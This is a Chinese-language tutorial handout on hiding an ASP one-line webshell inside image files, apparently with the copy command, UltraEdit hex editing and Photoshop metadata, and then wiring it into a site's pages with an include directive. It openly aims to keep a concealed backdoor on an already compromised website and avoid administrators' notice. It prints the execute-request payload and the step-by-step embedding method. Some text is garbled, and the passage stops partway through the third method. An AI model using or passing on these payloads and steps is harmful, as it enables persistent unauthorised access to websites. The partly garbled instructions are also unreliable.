一句話木馬圖片制作三種方法重點講義資料

Copy命令制作asp內(nèi)容：打開cmd，數(shù)據(jù)一下命令：此時打開兩個jpg文件，相比：且打開2.jpg可以像1.jpg一樣顯示圖像。把以下代碼放入目標網(wǎng)站，即可按asp執(zhí)行。<%#includefiles=””%>Uedit32（轉(zhuǎn)載）：本制作來自于：雪糕。我們通常在得到webshell之后都想給自己留個后門，等下次或以后有用得到的時候再進來看看。但如果直接加入一句話木馬<%executerequest("value")%>到asp文件中時，在該頁面上就會有類似如下的錯誤：MicrosoftVBScript運行時錯誤錯誤'800a000d'類型不匹配:'execute'/news1/show.asp，行3所以我們就可以開動腦筋了，使用插入一句話木馬的圖片做我們的后門。而且我們?nèi)绻凶銐虻臋?quán)限的話（希望網(wǎng)站中的文件可寫），就直接把網(wǎng)站原有的圖片變成后門，然后在那個asp文件中加入調(diào)用圖片后門的代碼：<!--#includefile="圖片后門地址"-->這樣就沒有上面的“類型不匹配:'execute'”錯誤了，而且也更好的隱藏了我們的后門。新挑戰(zhàn)始終會伴著新事物的出現(xiàn)而出現(xiàn)，當我們直接將我們的一句話木馬的asp文件改成jpg或gif文件的時候，這個圖片文件是打不開的，這又容易被管理員發(fā)現(xiàn)。然后我們就又開始思考并尋找新的方法：制作可以顯示圖片內(nèi)容的圖片格式后門。制作步驟：一、前期準備材料：2.一句話木馬服務器端代碼：<%executerequest("value")%>（其他的一句話也行）Script標簽：<SCRIPTRUNAT=SERVERLANGUAGE=JAVASCRIPT>一句話木馬服務器端代碼</SCRIPT>4.調(diào)用圖片后門代碼：<!--#includefile="圖片地址"-->工具：UltraEdit二、開始制作：UltraEdit打開1.jpg文件，然后按CTRL+F進行查找圖片中的“<%”和“%>”其中<%的十六進制代碼是3E25，那么%>就應該是253E，但是我們只把25改成00；之后我們在新建一個文本編輯窗口，將我們的script標簽代碼<SCRIPTRUNAT=SERVERLANGUAGE=JAVASCRIPT><%executerequest("value")%></SCRIPT>復制進去，然后點擊右鍵選擇十六進制編輯命令，這樣會跳轉(zhuǎn)到十六進制數(shù)據(jù)窗口，復制所有的十六進制的數(shù)據(jù)，粘貼到1.jpg的十六進制編輯窗口的最下面，說明：為什么要粘貼到最下面？假設(shè)你把srcipt標簽的十六進制代碼粘貼到中間的話，就會破壞圖片的完整性，那樣下面的圖片就看不到了，但是插入的一句話代碼還是起作用的。如圖：最后保存退出。完成整個過程，我們的圖片后門就做成?？吹搅税?，圖片和原來還是一樣的,但有時候會影響圖片顯示效果。說明：為什么要把“<%”和“%>”對應的十六進制中的25改成00呢？改成其他的行不行？雪糕猜想：因為在我們的一句話木馬服務器代碼<%executerequest("value")%>中含有“<%”和“%>”們，但我們使用一句話客戶端連接時，就可能發(fā)生尋找錯誤，然后就找不到我們的一句話服務器端代碼了，所以要把圖片中的相似結(jié)構(gòu)改成其他的。我想25也應該可以改成別的，但還沒實驗過。2.我們已經(jīng)做好了圖片后門，然后就是簡單的配置一下了。如果網(wǎng)站的asp網(wǎng)頁可以被寫入，那我們就將<!--#includefile="1.jpg"-->直接插入到網(wǎng)頁中，這樣這個網(wǎng)頁的url就是成了我們使用一句話客戶端連接的后門地址了；但要是不走運，那就自己新建一個asp文件，把<!--#includefile="1.jpg"-->加進去吧（這里我新建了一個1.asp文件）。Ps插入第二種方法：

1.用PS（photoshop）打開圖片

2.文件→文件簡介